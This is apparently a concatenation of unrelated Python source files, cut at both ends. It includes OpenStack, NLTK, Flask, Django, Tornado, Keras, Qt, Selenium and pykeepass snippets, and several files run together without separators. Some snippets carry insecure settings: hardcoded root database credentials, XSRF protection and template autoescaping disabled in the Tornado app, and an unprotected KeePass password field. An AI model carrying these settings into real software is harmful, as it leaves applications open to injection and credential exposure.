        if not self._ceilometer_client:
            self._ceilometer_client = ceilometer_client.Client(session=self._session)
        return self._ceilometer_client

    @property
    def cinder_client(self) -> cinder_client.Client:
        if not self._cinder_client:
            self._cinder_client = cinder_client.Client(session=self._session)
        return self._cinder_client

    @property
    def nova_client(self) -> nova_client.Client:
        if not self._nova_client:
            self._nova_client = nova_client.Client(session=self._session)
        return self._nova_client

    @property
    def neutron_client(self) -> neutron_client.Client:
        if not self._neutron_client:
            self._neutron_client = neutron_client.Client(session=self._session)
        return self._neutron_client
class OpenstackClient(OpenstackClientBase):
    """Thin facade over the Neutron and Nova clients for common operations."""

    def network_create(self, **attrs):
        # Neutron expects the attributes wrapped in a 'network' envelope.
        return self.neutron_client.create_network(body={'network': attrs})

    def network_list(self, **filters):
        return self.neutron_client.list_networks(**filters)

    def network_delete(self, network_id):
        return self.neutron_client.delete_network(network_id)

    def server_create(self, name, image, flavor, **extra):
        return self.nova_client.servers.create(
            name=name, image=image, flavor=flavor, **extra)

    def flavor_list(self, **filters):
        return self.nova_client.flavors.list(**filters)

    def image_list(self, **filters):
        return self.nova_client.images.list(**filters)
from nltk.corpus import wordnet, stopwords
from nltk.corpus import sentiwordnet as swn
from nltk.tokenize import word_tokenize
# Build the English stop-word set once at import time (O(1) membership tests).
stop_words = set(stopwords.words('english'))
def getDetails(word):
    """Print every WordNet synset of *word* (name, lemmas, definition,
    examples) and its SentiWordNet scores via printSWNresult."""
    syns = wordnet.synsets(word)
    print("Synsets: {}".format(syns))
    for syn in syns:
        print("Synset name:" + syn.name())
        print("Synset lemmas: {}".format(syn.lemmas()))
        print("Synset definition: " + syn.definition())
        print("Synset examples: {}".format(syn.examples()))
        printSWNresult(syn.name())
def printSWNresult(synetName):
    """Print SentiWordNet positive/negative scores and the net sentiment
    (positive minus negative) for the synset named *synetName*."""
    senti = swn.senti_synset(synetName)
    pos = senti.pos_score()
    neg = senti.neg_score()
    print("---SWN results----")
    print("Positive score = " + str(pos))
    print("Negative score = " + str(neg))
    print("Sentiment = " + str(pos - neg))
def getRelatedTermsOfWord(word):
    """Print lemmas and lexical relations of the first synset of *word*.

    FIX: guards against words with no synsets, which previously raised
    IndexError on syns[0].
    """
    syns = wordnet.synsets(word)
    if not syns:
        print("No synsets found for '{}'".format(word))
        return
    syn = syns[0]
    print(syn.lemmas())
    print(syn.hypernyms())
    print(syn.hyponyms())
    print(syn.member_holonyms())
    print(syn.part_meronyms())
# Demo calls for the helpers above.
getDetails("wonder")
getRelatedTermsOfWord("dog")
# Stop-word filtering demo: tokenize a sentence and drop English stop words.
example_sent = "This is a sample sentence, showing off the stop words filtration."
word_tokens = word_tokenize(example_sent)
filtered_sentence = [w for w in word_tokens if not w in stop_words]
print("Word tokens: {}".format(word_tokens))
print("Filtered sentence: {}".format(filtered_sentence))
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# Database connection settings (local MySQL).
username = "root"
pwd = "root"
ip = "127.0.0.1"
port = "3306"
database = "hogwarts"
# MySQL connection URI (pymysql driver), built from the settings above.
app.config['SQLALCHEMY_DATABASE_URI'] = f'mysql+pymysql://{username}:{pwd}@{ip}:{port}/{database}?charset=utf8'
# Set explicitly to silence the Flask-SQLAlchemy configuration warning.
# NOTE(review): True enables modification tracking (extra overhead); False is
# the usual choice when the feature is unused -- confirm intent.
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
db = SQLAlchemy(app)
class Testcase(db.Model):
    """ORM model for a test-case record."""
    id = db.Column(db.String(20), primary_key = True)
    node_id = db.Column(db.String(20), nullable = False)
    # FIX: was `db.remark(db.String(120))`, which raised AttributeError at
    # class creation -- SQLAlchemy columns are declared with db.Column.
    remark = db.Column(db.String(120))

    def __init__(self, id, node_id, remark):
        self.id = id
        self.node_id = node_id
        self.remark = remark

    def __repr__(self):
        # FIX: previously referenced self.username, which does not exist on
        # this model and raised AttributeError.
        return '<Testcase %r>' % self.id
if __name__ == '__main__':
    # WARNING: drop_all() destroys all existing tables before the schema is
    # recreated -- this is a destructive, development-only reset.
    db.drop_all()
    db.create_all()
|
from flask import Flask
from config import db
class Applicant(db.Model):
    """ORM model for a job applicant (first name, gender, city)."""
    __tablename__ = 'applicants'

    id = db.Column(db.Integer, primary_key=True)
    fname = db.Column(db.String(50), index=False, unique=False, nullable=False)
    gender = db.Column(db.String(50), index=False, unique=False, nullable=False)
    city = db.Column(db.String(50), index=False, unique=False, nullable=False)

    def __init__(self, fname, gender, city):
        self.fname = fname
        self.gender = gender
        self.city = city

    def serialize(self):
        """Return a plain-dict representation suitable for JSON responses."""
        return {
            'id': self.id,
            'fname': self.fname,
            'gender': self.gender,
            'city': self.city,
        }

    def __repr__(self):
        return str(self.serialize())
from django.urls import path
from .views import HomePage, ContactPage
# URL routes for the home app: site root and the contact page.
urlpatterns = [
    path('', HomePage.as_view(), name='home_detail_home'),
    path('contact/', ContactPage.as_view(), name='home_detail_contact'),
]
"""
single root plots - compares 2 root uptake profiles in one plot (root xylem potential, soil-root interface potential, resulting sink)
from xls result files (in results/)
"""
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
add_str = "_comp"  # scenario suffix of the result files: "_wet", "_dry"
# fnames = ["singleroot_cyl_constkrkx" + add_str + ".xls",
#           "singleroot_agg_constkrkx" + add_str + ".xls"]  #
# days = 0.51
fnames = ["singleroot_sra_dynamic_constkrkx" + add_str + ".xls",
          "singleroot_agg_dynamic_constkrkx" + add_str + ".xls"]  #
# fnames = ["singleroot_agg_dynamic_constkrkx" + add_str + ".xls"]
days = 7.1  # simulated duration covered by the result files [days]
titles = ["Steady rate", "Aggregated"]  # "Steady rate", , "Aggregated steady rate", "Rhizosphere"
plot_times = range(0, 7)  # days at which depth profiles are drawn
type_names = ["psix_", "psiinterface_", "sink_"]  # file prefix per plotted quantity
L = 50  # cm root length
path = "results/"
# Global matplotlib font sizes.
SMALL_SIZE = 16
MEDIUM_SIZE = 16
BIGGER_SIZE = 16
plt.rc('font', size = SMALL_SIZE)  # controls default text sizes
plt.rc('axes', titlesize = SMALL_SIZE)  # fontsize of the axes title
plt.rc('axes', labelsize = MEDIUM_SIZE)  # fontsize of the x and y labels
plt.rc('xtick', labelsize = SMALL_SIZE)  # fontsize of the tick labels
plt.rc('ytick', labelsize = SMALL_SIZE)  # fontsize of the tick labels
plt.rc('legend', fontsize = SMALL_SIZE)  # legend fontsize
plt.rc('figure', titlesize = BIGGER_SIZE)  # fontsize of the figure title
prop_cycle = plt.rcParams['axes.prop_cycle']
colors = prop_cycle.by_key()['color']
path = "results/"
# psi_interface = ["psiinterface_singleroot_sra_constkrkx_wet.xls", "psiinterface_singleroot_cyl_constkrkx_wet.xls"]
# labels = ["python sra", "python cylindrical"]
# Three panels: xylem potential, soil-root interface potential, sink term.
fig, ax = plt.subplots(1, 3, figsize = (15, 10))
ax[0].set_title("$\psi_x$ [cm]")
ax[1].set_title("$\psi_{interface}$ [cm]")
ax[2].set_title("sink [cm$^3$]")
ax[0].set_ylabel("depth [cm]")
ax[0].set_xlabel("xylem potential [cm]")
ax[1].set_xlabel("interface potential [cm]")
ax[2].set_xlabel("root uptake [cm$^3$/day]")
ls = ['-', '-.']  # one linestyle per input file
for i in range(0, len(fnames)):
    # Each file holds rows = time steps, columns = root segments.
    df = pd.read_excel(path + type_names[0] + fnames[i], header = None)
    psi_x_ = df.to_numpy()
    df1 = pd.read_excel(path + type_names[1] + fnames[i], header = None)
    psi_interface_ = df1.to_numpy()
    df2 = pd.read_excel(path + type_names[2] + fnames[i], header = None)
    sink_ = df2.to_numpy()
    z_ = np.linspace(-L + 0.25, -0.25, sink_.shape[1])  # single root 100 segments, 0 - (-50) cm, segment mids
    # Row indices closest to mid-day (peak, offset 0.5 d) and to day start
    # (redistribution) for each day in plot_times.
    peak_id = np.round(sink_.shape[0] / days * np.array([0.5 + i for i in plot_times]))
    peak_id = peak_id.astype(int)
    redistribution_id = np.round(sink_.shape[0] / days * np.array([i for i in plot_times]))
    redistribution_id = redistribution_id.astype(int)
    # Color fades from bright (early) to dark (late) over the time steps.
    color_intensity = np.ones((sink_.shape[0]),) * 0.2 + np.linspace(1., 0., sink_.shape[0]) * 0.8
    for j in range(0, sink_.shape[0]):
        if j == peak_id[0]:
            # First peak gets the legend entry.
            ax[0].plot(psi_x_[j,:], z_, color = [color_intensity[j], 0., 0.], linestyle = ls[i])
            ax[1].plot(psi_interface_[j,:], z_, color = [color_intensity[j], 0., 0.], linestyle = ls[i])
            ax[2].plot(sink_[j,:], z_, color = [color_intensity[j], 0., 0.], label = "peak " + titles[i], linestyle = ls[i])
        if j in peak_id[1:]:
            ax[0].plot(psi_x_[j,:], z_, color = [color_intensity[j], 0., 0.], linestyle = ls[i])
            ax[1].plot(psi_interface_[j,:], z_, color = [color_intensity[j], 0., 0.], linestyle = ls[i])
            ax[2].plot(sink_[j,:], z_, color = [color_intensity[j], 0., 0.], linestyle = ls[i])
        if j == redistribution_id[0]:
            # Initial state drawn in blue.
            ax[0].plot(psi_x_[j,:], z_, 'b', linestyle = ls[i])
            ax[1].plot(psi_interface_[j,:], z_, 'b:', linestyle = ls[i])
            ax[2].plot(sink_[j,:], z_, 'b', label = "initial " + titles[i])
        if j == redistribution_id[1]:
            # First redistribution gets the legend entry (green shades).
            ax[0].plot(psi_x_[j,:], z_, color = [0., color_intensity[j], 0.], linestyle = ls[i])
            ax[1].plot(psi_interface_[j,:], z_, color = [0., color_intensity[j], 0.], linestyle = ls[i])
            ax[2].plot(sink_[j,:], z_, color = [0., color_intensity[j], 0.], label = "redistribution " + titles[i], linestyle = ls[i])
        if j in redistribution_id[2:]:
            ax[0].plot(psi_x_[j,:], z_, color = [0., color_intensity[j], 0.], linestyle = ls[i])
            ax[1].plot(psi_interface_[j,:], z_, color = [0., color_intensity[j], 0.], linestyle = ls[i])
            ax[2].plot(sink_[j,:], z_, color = [0., color_intensity[j], 0.], linestyle = ls[i])
if add_str == "_dry":
    ax[2].set_xlim(-0.0025, 0.005)
ax[2].legend()
plt.tight_layout()
plt.show()
|
# @Copyright(C), OldFive, 2020.
# @Date : 2021/3/24 0024 15:30:05
# @Author : OldFive
# @Version : 0.1
# @Description :
# @History :
# @Other:
# ▒█████ ██▓ ▓█████▄ █████▒██▓ ██▒ █▓▓█████
# ▒██▒ ██▒▓██▒ ▒██▀ ██▌▓██ ▒▓██▒▓██░ █▒▓█ ▀
# ▒██░ ██▒▒██░ ░██ █▌▒████ ░▒██▒ ▓██ █▒░▒███
# ▒██ ██░▒██░ ░▓█▄ ▌░▓█▒ ░░██░ ▒██ █░░▒▓█ ▄
# ░ ████▓▒░░██████▒░▒████▓ ░▒█░ ░██░ ▒▀█░ ░▒████▒
# ░ ▒░▒░▒░ ░ ▒░▓ ░ ▒▒▓ ▒ ▒ ░ ░▓ ░ ▐░ ░░ ▒░ ░
# ░ ▒ ▒░ ░ ░ ▒ ░ ░ ▒ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░
# ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░░ ░
# ░ ░ ░ ░ ░ ░ ░ ░ ░
# ░ ░
#
"""
历史数据实体类
"""
# Standard library imports
# Third party imports
# Local application imports
class HistoryData(object):
    """Container for historical data samples (interface stub)."""

    def __init__(self, table_name):
        """Store the name of the table this history belongs to."""
        # BUG FIX: the parameter was previously assigned to a *local*
        # variable ("table_name = 0") and silently discarded, so instances
        # never kept the table name.
        self.table_name = table_name

    def min(self):
        """Return the minimum value currently in the queue (not implemented)."""

    def max(self):
        """Return the maximum value currently in the queue (not implemented)."""

    def have(self, num):
        """Return whether *num* exists in the queue (not implemented)."""

    def append(self, other):
        """Append new data to the history (not implemented)."""
|
#Binary search
#As opposed to linear search it assigns a left and right value to a sorted array, halves it, and assigns a middle value, then checks if the mid value is the searched value
# if so => search successful
# if not => whether the searched value is bigger or smaller than the mid value, it changes the position of the left/right anchors, and start iteration again
# Sample data: a sorted list and a search value that is absent (21 > max).
nums = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
sv = 21
def binarysearch(numlist, searchValue):
    """Binary-search *searchValue* in *numlist*.

    Note: the list is sorted in place first, so unsorted input is accepted
    (and the caller's list is mutated).

    Returns "<value> found" on success, "Value not found" otherwise.
    """
    numlist.sort()
    left = 0
    right = len(numlist) - 1
    while left <= right:
        # FIX: use floor division for the midpoint; round() applies
        # banker's rounding, which is surprising and non-idiomatic here.
        mid = (left + right) // 2
        if numlist[mid] == searchValue:
            return str(searchValue) + " found"
        elif numlist[mid] > searchValue:
            right = mid - 1
        else:
            left = mid + 1
    return "Value not found"
# sv (21) is not in nums, so this prints "Value not found".
print(binarysearch(nums,sv))
|
# -*- coding: utf-8 -*-
"""
===============================================
Project Name:
Working with Python
-----------------------------------------------
Developer:
Operate:--Orion Analysis Team--
Program:--Vector Data Analysis Team--
...............................................
Author(Analyst):朱立松--Mr.Zhu--
The Chief of Teams
===============================================
"""
import pandas as pd
import numpy as np
import os
alist = []  # NOTE(review): never used below -- confirm it can be removed
# NOTE(review): the log file is opened for append but never written to;
# presumably the progress messages were meant to go here -- confirm intent.
with open('E:/the_data/tjdaisu.txt',"a+") as log_writter:
    for name in os.listdir('E:/the_data/the_all_data/thedata'):
        domain = os.path.abspath(r'E:/the_data/the_all_data/thedata')  # folder path
        info = os.path.join(domain,name)  # join folder and file name into the full path
        data = pd.read_csv(info)  # read the csv data file
        print('已读取数据文件{}'.format(name))
        # Sum of ACC state and GPS speed per row.
        acc_state = data['acc_state']
        gps_speed = data['gps_speed']
        accadds = acc_state + gps_speed
        adir = {'accadds':list(accadds)}
        accadds = pd.DataFrame(adir)
        print('已求出状态与速度之和')
        # Append the new column to the original table.
        data = pd.concat([data,accadds],axis=1)
        print('已建立新的数据表格')
        file_name = str('E:/the_data/best_data_D/{}'.format(name))  # output path
        data.to_csv(file_name)  # write the result
        print('已输出新文件{}'.format(name))
# Generated by Django 2.0.6 on 2020-09-15 11:09
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Relax tbook price fields and tcar count to allow NULL/blank, and make
    the tcar->user FK nullable with DO_NOTHING on delete."""

    dependencies = [
        ('index', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='tbook',
            name='book_price',
            field=models.FloatField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='tbook',
            name='new_price',
            field=models.FloatField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='tcar',
            name='count',
            field=models.IntegerField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='tcar',
            name='user',
            # DO_NOTHING: deleting a TUser leaves the FK untouched at the DB level.
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='index.TUser'),
        ),
    ]
|
#importing libraries here
import pandas as pd
import numpy as np
import seaborn as sns
#import data
df = pd.read_csv('fake_reg.csv')
X = df[['feature1', 'feature2']].values
y = df['price'].values
from sklearn.model_selection import train_test_split
#spliting data
X_train, X_test, y_train ,y_test = train_test_split(X,y,test_size=0.3,random_state=42)
#scaling sets
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
# Fit the scaler on the training set only, then apply to both splits
# (avoids leaking test statistics into training).
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
#loading models
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense,Activation
model = Sequential()
model.add(Dense(4, activation='relu'))
model.add(Dense(4, activation='relu'))
model.add(Dense(4,activation='relu'))
# NOTE(review): y is a single scalar (price) but this output layer has 4
# units -- a regression head is normally Dense(1); confirm intent.
model.add(Dense(4))
model.compile(optimizer='rmsprop', loss='mse')
#fitting model to train sets
model.fit(X_train,y_train,epochs=250)
from tensorflow.keras.models import load_model  # NOTE(review): imported but unused here
model.save('my_model.h5')
|
# Generated by Django 2.2 on 2019-05-26 08:19
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make decision.decisionDate optional (NULL/blank allowed)."""

    dependencies = [
        ('hist', '0003_auto_20190525_2113'),
    ]

    operations = [
        migrations.AlterField(
            model_name='decision',
            name='decisionDate',
            field=models.DateField(blank=True, null=True),
        ),
    ]
|
from django.conf import settings as django_settings
from rest_framework import permissions
from rest_framework.compat import is_authenticated
class IsOwnerOrDeny(permissions.BasePermission):
    """
    Custom permission to only allow owners of an object to edit it.
    """

    def has_permission(self, request, view):
        # NOTE(review): rest_framework.compat.is_authenticated was removed in
        # newer DRF releases -- confirm the pinned DRF version provides it.
        return is_authenticated(request.user)

    def has_object_permission(self, request, view, obj):
        # check if user is owner (object id must equal the requesting user's id)
        return obj.id == request.user.id
class IsValidDisableCustomersToken(permissions.BasePermission):
    """
    Custom permission to only allow requests with a valid request.data['token'].
    """

    def has_permission(self, request, view):
        # Shared-secret check against the configured token.
        return request.data.get('token') == django_settings.DISABLE_EXPIRED_CUSTOMERS_TOKEN
class IsAuthenticatedAthlete(permissions.BasePermission):
    """
    Custom permissions to only allow requests from athletes
    """

    def has_permission(self, request, view):
        # Requires both authentication and the project-defined athlete role.
        return is_authenticated(request.user) and request.user.is_athlete()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import logging
import tornado.ioloop
import tornado.web
import tornado.escape
from tornado.options import define, options
import config
from handlers import uimodules
import routers
def config_logging():
    """Apply logging level/format from the application config."""
    log_cfg = config.app.logging
    fmt = log_cfg.get("format", None)
    level = log_cfg.get("level")
    if fmt:
        logging.basicConfig(format=fmt)
    if level:
        # Tornado owns the root logging level via its options.
        tornado.options.options.logging = level
def remote_debug():
    """Attach to a PyCharm remote debugger when config.app.remote.debug == "True"."""
    remote = config.app.remote
    if remote and remote.get("debug") == "True":
        try:
            # Imported lazily: only needed (and installed) in debug setups.
            import pydevd
            host = remote.get("host")
            port = remote.get("port")
            pydevd.settrace(host, port=int(port), stdoutToServer=True,
                            stderrToServer=True)
        except ImportError:
            logging.error("remote debug start fail! need pycharm-debug.egg!")
class Application(tornado.web.Application):
    """Tornado application wired with the project's routers, templates,
    static resources and UI modules."""

    def __init__(self):
        routes = routers.routers
        settings = dict(
            debug=options.debug,
            site_title=config.app.site_title,
            cookie_secret=config.app.cookie_secret,
            xsrf_cookies=False,  # XSRF protection disabled
            template_path=os.path.join(os.path.dirname(__file__), "template"),
            static_path=os.path.join(os.path.dirname(__file__), "resource"),
            login_url="/login",
            ui_modules=uimodules,
            autoescape=None,  # template auto-escaping disabled
        )
        tornado.web.Application.__init__(self, routes, **settings)
def main():
    """Configure logging/debugging, initialise the DB and start the server."""
    config_logging()
    remote_debug()
    logging.info("server start...")
    # Imported lazily so logging/debug hooks are set up before DB init.
    from storage.mysql.database import init_db
    init_db()
    # Command-line options must be defined before parse_command_line().
    define("dev", default=False, help="Is development env?", type=bool)
    define("port", default=8215, help="run on the given port", type=int)
    define("debug", default=False, help="is debug model?", type=bool)
    tornado.options.parse_command_line()
    app = Application()
    app.listen(options.port)
    logging.info(
        "Statistics server run on the %s and the debug model is %s" % (
            options.port, options.debug))
    tornado.ioloop.IOLoop.instance().start()


if __name__ == "__main__":
    main()
|
# Demo: inspecting the type of a value with type().
print("1 : Getting datatype of any value--------- ")
x = 67
# print("Type of x is : ",type(x))
print(type(x))
# BUG FIX: a bare `print` is just a reference to the builtin and emits
# nothing; call it to print the intended blank line.
print()
Complex = 1j
print(type(Complex))
|
from PySide6 import QtGui, QtWidgets, QtCore
import pyqtgraph as pg
import sys, math, time
from collections import deque
import libmapper as mpr
''' TODO
show network interfaces, allow setting
show metadata
'''
class Tree(QtWidgets.QTreeWidget):
    """Tree widget whose signal rows can be dragged out as libmapper URIs."""

    def __init__(self):
        super(Tree, self).__init__()
        self.setDragEnabled(True)

    def mouseMoveEvent(self, e):
        # Only child items (signals) are draggable; top-level rows are devices.
        item = self.itemAt(e.position().toPoint())
        if item == None or item.parent() == None:
            return
        # Encode "device/signal @id <id>" as text for the drop target.
        mimeData = QtCore.QMimeData()
        mimeData.setText('libmapper://signal ' + item.parent().text(0) + '/' + item.text(0) + ' @id ' + item.text(1))
        drag = QtGui.QDrag(self)
        drag.setMimeData(mimeData)
        dropAction = drag.exec(QtCore.Qt.CopyAction)
class MainWindow(QtWidgets.QMainWindow):
    """Main window: mirrors all libmapper devices and signals in a sortable tree."""

    def __init__(self):
        super(MainWindow, self).__init__()
        # Subscribe to device and signal events on the libmapper graph.
        self.graph = mpr.Graph(mpr.Type.DEVICE | mpr.Type.SIGNAL)
        self.graph.add_callback(self.on_event, mpr.Type.DEVICE | mpr.Type.SIGNAL)
        self.setWindowTitle('libmapper signal browser')
        self.setGeometry(300, 300, 375, 300)
        self.tree = Tree()
        self.tree.setHeaderLabels(['name', 'id', 'type', 'length', 'direction'])
        # Column 1 holds the libmapper id; used for lookups, never shown.
        self.tree.setColumnHidden(1, True)
        self.tree.setColumnWidth(0, 200)
        self.tree.setColumnWidth(1, 60)
        self.tree.setColumnWidth(2, 50)
        self.tree.setColumnWidth(3, 50)
        self.tree.setSortingEnabled(True)
        self.setCentralWidget(self.tree)
        # Poll the graph every 25 ms.
        self.timer = QtCore.QTimer()
        self.timer.setInterval(25)
        self.timer.timeout.connect(self.timer_event)
        self.timer.start()

    def on_event(self, type, obj, event):
        """Graph callback: add/remove tree rows as devices and signals appear/expire."""
        if type == mpr.Type.DEVICE:
            if event == mpr.Graph.Event.NEW:
                dev_item = QtWidgets.QTreeWidgetItem(self.tree, [obj[mpr.Property.NAME]])
                dev_item.setText(1, str(obj[mpr.Property.ID]))
                dev_item.setExpanded(True)
            elif event == mpr.Graph.Event.REMOVED or event == mpr.Graph.Event.EXPIRED:
                # Look the device up by id (hidden column 1) and drop its row.
                items = self.tree.findItems(str(obj[mpr.Property.ID]), QtCore.Qt.MatchFixedString, 1)
                for item in items:
                    item = self.tree.takeTopLevelItem(int(self.tree.indexOfTopLevelItem(item)))
                    del item
        elif type == mpr.Type.SIGNAL:
            if event == mpr.Graph.Event.NEW:
                # find parent device
                dev_items = self.tree.findItems(str(obj.device()[mpr.Property.ID]), QtCore.Qt.MatchFixedString, 1)
                for dev_item in dev_items:
                    sig_item = QtWidgets.QTreeWidgetItem(dev_item, [obj[mpr.Property.NAME], str(obj[mpr.Property.ID]), obj[mpr.Property.TYPE].name.lower(), "{}".format(obj[mpr.Property.LENGTH]), "out" if (obj[mpr.Property.DIRECTION] == mpr.Direction.OUTGOING) else "in"])
            elif event == mpr.Graph.Event.REMOVED or event == mpr.Graph.Event.EXPIRED:
                # Recursive match: signal rows are children of device rows.
                sig_items = self.tree.findItems(str(obj[mpr.Property.ID]), QtCore.Qt.MatchFixedString | QtCore.Qt.MatchRecursive, 1)
                for sig_item in sig_items:
                    parent = sig_item.parent()
                    item = parent.takeChild(int(parent.indexOfChild(sig_item)))
                    del item

    def timer_event(self):
        # Process queued graph events (blocks up to 10 ms).
        self.graph.poll(10)

    def remove_graph(self):
        # Free the underlying C graph object on shutdown.
        self.graph.free()
# Application entry: build the window and free the libmapper graph at exit.
app = QtWidgets.QApplication(sys.argv)
main = MainWindow()
import atexit
atexit.register(main.remove_graph)
main.show()
app.exec()
|
from selenium.webdriver.common.by import By
class BasePageLocators:
    """Locators shared by all page objects."""
    BASE_PAGE_LOADED_LOCATOR = ''  # sentinel: subclasses override with a real locator
    QUERY_LOCATOR = (By.NAME, 'q')
    GO_LOCATOR = (By.ID, 'submit')
    INPUT_SUBMIT_LOCATOR = (By.XPATH, "//input[@type='submit']")
class LoginPageLocators(BasePageLocators):
    """Locators for the login page and python.org landing elements."""
    COMPREHENSIONS = (By.XPATH, '//code/span[@class="comment" and contains(text(), "comprehensions")]')
    EVENTS_BUTTON = (By.XPATH, '//li[@id="events"]/a[@href="/events/"]')
    # Template locator: format with the event slug before use.
    EVENTS_LINK_TEMPLATE = (By.XPATH, '//li[@id="events"]//a[@href="/events/{}"]')
    INTRODUCTION = (By.CSS_SELECTOR, 'div.introduction')
    LEARN_MORE_RELATIVE = (By.CSS_SELECTOR, 'a.readmore')
    MEMBERSHIP_DRIVE = (By.XPATH, '//a[@href="https://www.python.org/psf/membership/"]')
    LOGIN_HEAD_LOCATOR = (By.XPATH, "//div[contains(@class, 'responseHead-module-button')]")
    EMAIL_LOCATOR = (By.NAME, "email")
    PASSWORD_LOCATOR = (By.NAME, "password")
    LOGIN_BUTTON_LOCATOR = (By.XPATH, "//div[contains(@class,'authForm-module-button')]")
    USER_LOCATOR = (By.XPATH, "//div[contains(@class, 'right-module-userNameWrap')]")
    NOTIFY_EMAIL = (By.XPATH, "//div[contains(@class, 'notify-module-content') and contains(text(), 'Введите email')]")
class PythonEventsPageLocators(BasePageLocators):
    """Locators for the python.org events page."""
    EURO_PYTHON_2022 = (By.XPATH, '//a[contains(text(), "EuroPython 2022")]')
    LOCATION = (By.CLASS_NAME, 'single-event-location')
class DashboardPageLocators(BasePageLocators):
    """Locators for the advertising dashboard (campaign list and actions)."""
    DASHBOARD = (By.XPATH, "//a[@href = '/dashboard']")
    CAMPAIGN_NEW = (By.XPATH, "//a[@href = '/campaign/new']")
    CAMPAIGN_NEW_2 = (By.XPATH, "//div[contains(text(), 'Создать кампанию')]")
    SETTING_CAMPAIGN = (By.XPATH, "(//div[contains(@data-entity-type, 'campaign')])[2]")
    DELETE_LI = (By.XPATH, "//li[@title = 'Удалить']")
    SEGMENTS_LOCATOR = (By.XPATH, "//a[@href = '/segments']")
    # Template locators: format with page slug / campaign title before use.
    PAGE_LOCATORS_TEMPLATE = (By.XPATH, "//a[@href = '/{}']")
    CAMPAIGN_TITLE_TEMPLATE = (By.XPATH, "//a[contains(@title, '{}')]")
class CampaignPageLocators(BasePageLocators):
    """Locators for the campaign creation form."""
    TRAFFIC = (By.XPATH, "//div[contains(text(), 'Трафик')]")
    TEASER = (By.XPATH, "//span[contains(text(), 'Тизер')]")
    INPUT_LINK = (By.XPATH, "//input[contains(@data-gtm-id,'ad_url_text')]")
    INPUT_FILE = (By.XPATH, "//input[@data-test='image_90x75']")
    INPUT_TITLE = (By.XPATH, "//input[@data-name='title_25']")
    INPUT_TEXT = (By.XPATH, "//textarea[@data-name='text_90']")
    INPUT_CAMPAIGN_TITLE = (By.XPATH, "//div[contains(@class, 'input_campaign-name')]//input")
    SUBMIT_BUTTON = (By.XPATH, "//button[./div[contains(text(), 'Создать кампанию')]]")
class SegmentsPageLocators(BasePageLocators):
    """Locators for the audience segments page (create/remove flows)."""
    CREATE_SEGMENT_BUTTON = (By.XPATH, "//a[contains(@href, '/segments/segments_list/new/')]")
    SEGMENT_APPS = (
        By.XPATH,
        "//div[contains(@class, 'adding-segments-modal__block-left')]/div[contains(text(), 'Приложения и игры')]")
    SEGMENT_APPS_CHECKBOX = (By.XPATH, "//input[contains(@class, 'adding-segments-source__checkbox')]")
    SUBMIT_BUTTON_ADD = (By.XPATH, "//button[./div[contains(text(), 'Добавить сегмент')]]")
    SUBMIT_BUTTON_CREATE = (By.XPATH, "//button[./div[contains(text(), 'Создать сегмент')]]")
    REMOVE_BUTTON = (By.XPATH, "//div[contains(@data-test, 'remove')]")
    # NOTE(review): contains(text(), '') is always true -- the predicate looks
    # redundant; confirm whether it was meant to match a specific value.
    INPUT_SEGMENT_TITLE = (By.XPATH, "//div[contains(@class, 'input_create-segment')]//input[contains(text(), '')]")
    # Template locator: format with the segment title before use.
    SEGMENT_TABLE_TITLE = (By.XPATH, "//div[contains(@class, 'main-module-TableWrapper')]//a[contains(text(), '{}')]")
    BUTTON_CONFIRM_REMOVE = (By.XPATH, "//button[contains(@class, 'button_confirm-remove')]")
|
# Palindrome check: read N strings, uppercase each, and report per case
# whether the string reads the same forwards and backwards.
n = int(input())
for i in range(n):
    s = input().upper()
    # s[::-1] is the reversed string
    if s == s[::-1]:
        print("#%d Yes" % (i + 1))
    else:
        print("#%d No" % (i + 1))
|
# FIXME python2
from __future__ import absolute_import, unicode_literals
from future.utils import python_2_unicode_compatible
import logging
from copy import deepcopy
from datetime import datetime
from lxml.builder import E
from lxml.etree import Element, _Element
from lxml.objectify import ObjectifiedElement
import pykeepass.attachment
import pykeepass.group
from pykeepass.baseelement import BaseElement
logger = logging.getLogger(__name__)
# String-field keys managed by KeePass itself; custom properties must not
# use these names (enforced in Entry.set_custom_property / get_custom_property).
reserved_keys = [
    'Title',
    'UserName',
    'Password',
    'URL',
    'Tags',
    'IconID',
    'Times',
    'History',
    'Notes'
]
# FIXME python2
@python_2_unicode_compatible
class Entry(BaseElement):
    def __init__(self, title=None, username=None, password=None, url=None,
                 notes=None, tags=None, expires=False, expiry_time=None,
                 icon=None, autotype_sequence=None, autotype_enabled=True,
                 element=None, kp=None):
        """Create a new Entry, or wrap an existing XML Entry element.

        If *element* is None a fresh 'Entry' element is built with the given
        fields; otherwise *element* must be an lxml 'Entry' element and is
        adopted as-is.
        """
        self._kp = kp
        if element is None:
            super(Entry, self).__init__(
                element=Element('Entry'),
                kp=kp,
                expires=expires,
                expiry_time=expiry_time,
                icon=icon
            )
            self._element.append(E.String(E.Key('Title'), E.Value(title)))
            self._element.append(E.String(E.Key('UserName'), E.Value(username)))
            # NOTE(review): passwords are usually marked protected="True" in
            # KDBX XML -- confirm "False" is intentional here.
            self._element.append(
                E.String(E.Key('Password'), E.Value(password, protected="False"))
            )
            if url:
                self._element.append(E.String(E.Key('URL'), E.Value(url)))
            if notes:
                self._element.append(E.String(E.Key('Notes'), E.Value(notes)))
            if tags:
                # Tags may be given as a list or as a pre-joined ';' string.
                self._element.append(
                    E.Tags(';'.join(tags) if type(tags) is list else tags)
                )
            # NOTE(review): str(autotype_sequence) produces the literal string
            # "None" when no sequence is given -- confirm this is intended.
